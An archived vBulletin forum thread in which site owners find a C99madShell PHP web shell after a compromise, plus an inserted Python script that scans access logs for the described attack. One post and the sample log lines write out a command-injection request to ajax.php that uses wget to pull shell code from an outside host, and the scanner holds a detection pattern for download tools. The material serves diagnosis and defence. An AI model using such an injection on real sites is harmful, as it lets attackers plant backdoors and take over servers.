vb.org Archive


ryan.gottlieb 01-21-2009 02:04 AM

C99madShell v. 2.0 madnet edition
 
I upgraded vBulletin 3.8 from 3.7, and now whenever I try to edit subscriptions, this comes up... it's a PHP shell script....

--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] ---------------

solved.... error.php

Dismounted 01-21-2009 03:04 AM

By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.

ryan.gottlieb 01-27-2009 01:33 AM

No, by SOLVED I meant I removed the script.. (The shell script)

Dismounted 01-27-2009 02:58 AM

That still does not solve how the attacker got the file there. Unless you know that already too?

blowy 08-23-2011 10:50 AM

I am having this problem as well... When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13

Marco64Th 08-24-2011 03:56 AM

This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.

Crad 08-24-2011 02:01 PM

Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

TheLastSuperman 08-24-2011 03:06 PM

Quote:

Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

Tomato, Tomato or Potato, Potato, it does not matter; it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter, and tbo I have no clue why you even posted that last snippet of quick wit, nothing to cheer about until you've removed it :erm:.

daydie 08-24-2011 06:27 PM

They get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vBulletin upgrading / securing the ajax.php ASAP
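
One way to check access logs for the request shape described in the post above, as an added example that is not part of the original thread. It assumes Apache combined-format logs; the function name, the token list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# A parameter value that names a download tool or carries a remote URL.
SUSPICIOUS = re.compile(r'\b(?:wget|curl|fetch)\b|(?:https?|ftp)://', re.I)

SAMPLE_LOG = [  # constructed lines; hosts and addresses are placeholders
    '203.0.113.9 - - [23/Aug/2011:10:41:07 +0000] "GET /ajax.php?global='
    'wget%20http%3A%2F%2Fwww.example.org%2Fc100.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [23/Aug/2011:10:42:10 +0000] '
    '"POST /ajax.php?do=usersearch HTTP/1.1" 200 231 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Aug/2011:10:43:55 +0000] "GET /forum/ajax.php?global='
    'wget http://www.example.org/c100.txt HTTP/1.1" 400 226 "-" "-"',
    '198.51.100.4 - - [23/Aug/2011:10:44:01 +0000] '
    '"GET /showthread.php?t=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def suspicious_ajax_hits(lines, script="ajax.php"):
    """Return (ip, timestamp, status, param, value) for each flagged request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qsl percent-decodes and maps '+' to a space, so encoded
        # forms of the same request are matched too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SUSPICIOUS.search(value):
                hits.append((m["ip"], m["ts"], int(m["status"]), name, value))
    return hits

if __name__ == "__main__":
    for ip, ts, status, name, value in suspicious_ajax_hits(SAMPLE_LOG):
        print(f"{ts}  {ip}  status={status}  {name}={value!r}")
```

A hit marks a request for review, not proof of compromise; the client address and timestamp give a starting point for checking which files changed on disk around that time.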

Marco64Th 08-25-2011 02:51 AM

Quote:

Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if I use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?


All times are GMT.